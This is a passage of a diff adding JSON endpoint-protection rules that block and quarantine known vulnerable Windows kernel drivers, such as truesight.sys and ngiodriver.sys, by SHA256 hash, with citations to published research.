+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824744Z",
+ "creation_date": "2026-03-23T11:45:31.824746Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824752Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72a3e975efe38c77ad08dfd6157441a20fb019cabc9690a8ea581ce853b3e849",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "28fa2cac-d391-5fc8-9def-0d80a8681181",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827415Z",
+ "creation_date": "2026-03-23T11:45:30.827418Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827424Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55161795c5c581bdc27485517bab35b0833a77352863a78ae4f964f29eeb49ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "291fd1b8-1cae-5f23-a4a6-69e6332436bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984769Z",
+ "creation_date": "2026-03-23T11:45:29.984771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984776Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8d748834fb982fa033cd2671843de727999b21fad30979ac4acc4828910ef8b",
+ "comment": "Dangerous Physmem Kernel Driver (aka AsrIbDrv.Sys) [https://www.loldrivers.io/drivers/31797996-6973-402d-a4a0-d01ce51e02c0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "293bb433-d95d-5be9-bdd2-f9a5cceef068",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830332Z",
+ "creation_date": "2026-03-23T11:45:30.830334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4c44e3bb181ff2a7eb2bc636f8329bdc23978c99d83187da0b0c1eeb938fd07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2953ef13-5600-51a7-aed2-e4c9b852afb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486719Z",
+ "creation_date": "2026-03-23T11:45:31.486722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6464deb7e8579caa7fa5c082208afa742ac599b48b51339b55315f3e8ebf22b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2956366e-56a8-562b-a0a5-678ab3cd30b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816594Z",
+ "creation_date": "2026-03-23T11:45:30.816597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c23ac21bfcf3bd7f76d4f3b91844ab35427a1a2d3bbaf93f7916edf7569e4b22",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "29691329-9ff2-51de-9ceb-2380494b9375",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498779Z",
+ "creation_date": "2026-03-23T11:45:31.498782Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498791Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7dbc0fa7f12095caae00bca5e1d9e51f226290cb993aad2f39fbc8db670a2a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "296bc7b7-fab7-519f-b93b-70a424453b25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614649Z",
+ "creation_date": "2026-03-23T11:45:29.614650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79e2d37632c417138970b4feba91b7e10c2ea251c5efe3d1fc6fa0190f176b57",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "296e8761-5546-5b82-a8a2-52deea4971fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494942Z",
+ "creation_date": "2026-03-23T11:45:31.494944Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494957Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bd3d995db6fbb4593d2ade20e4003b2e27ffad6a45f0a564bd9cf4ad7a8bafd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2974722a-2640-5131-8342-0e94a05cf11d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154536Z",
+ "creation_date": "2026-03-23T11:45:31.154538Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154543Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eabb2df58b057820cc50c7dcf5d40e8a705b4b87034909f9f0e246ca01aa9e75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2977d0cd-5454-5b73-b0ae-6a5020444b22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457450Z",
+ "creation_date": "2026-03-23T11:45:30.457453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2978634e-cab4-5ea5-8389-b51d38d6e6e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819637Z",
+ "creation_date": "2026-03-23T11:45:30.819639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819645Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2203bd4731a8fdc2a1c60e975fd79fd5985369e98a117df7ee43c528d3c85958",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2983778e-2354-55fb-95c4-e8e8dda0e606",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500787Z",
+ "creation_date": "2026-03-23T11:45:31.500790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8210ad8240cda74c5f7a4a328be2182ffe3395c3dd9b0882ad801715a5387772",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "29843084-aa9e-51d4-8192-c79b760012d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825529Z",
+ "creation_date": "2026-03-23T11:45:31.825531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06b0976210196e847367d79c7bdc8ca9a8c078af7b5ad20cbfc61dbc0fb267af",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "29a6311c-8046-5d45-83ef-4fad95eff34a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983686Z",
+ "creation_date": "2026-03-23T11:45:29.983688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980",
+ "comment": "Vulnerable Kernel Driver (aka WCPU.sys) [https://www.loldrivers.io/drivers/7f645b95-4374-47ae-be1a-e4415308b550/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "29afccbb-b875-5d92-a880-906165790491",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828278Z",
+ "creation_date": "2026-03-23T11:45:31.828281Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b63666ddf88d0b624170e3799d8bbb1013868b272a6a33d1e3228a458a17a9de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "29d15e5e-eb16-5057-8ac1-9d4207e00314",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485676Z",
+ "creation_date": "2026-03-23T11:45:31.485680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d9ea84656fca35befae97f0320a3373ceeb6001cdb296e0b7d38e9032e571b6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "29e421e8-c55e-5810-8506-2e050cf1abe5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816191Z",
+ "creation_date": "2026-03-23T11:45:30.816193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e3bc2d7bc56971457d642458563435c7e5c9c3c7c079ef5abeb6a61fb4d52ea",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "29f5a697-7650-57d2-992f-505712953bf7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142524Z",
+ "creation_date": "2026-03-23T11:45:31.142526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "139cf28440079aa09f659a9d29a3fc5800071d69fdbe57f0a07b42ec9baa6ea4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a0b1644-6fa5-5e00-9b72-6ecfe006d24c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831036Z",
+ "creation_date": "2026-03-23T11:45:30.831038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d5f1f60a027b52eedd8c48c003f193241f492970a078c0c8d9bbc1391efd9ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a1f2b20-8cb2-556f-9148-e4225b967f66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822657Z",
+ "creation_date": "2026-03-23T11:45:31.822660Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822669Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1556dd49b3de1aa42158edd10ecc67cdc395d9ee87905562ea6b080a9ed429d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a2f6431-3538-5347-809a-04ab34479b4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973861Z",
+ "creation_date": "2026-03-23T11:45:29.973863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973879Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8027daa6facf1ff81405daf6763249e9acf232a1a191b6bf106711630e6188e",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2a3570d8-35a3-5499-a8c9-d5b09d3d2e78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979619Z",
+ "creation_date": "2026-03-23T11:45:29.979621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
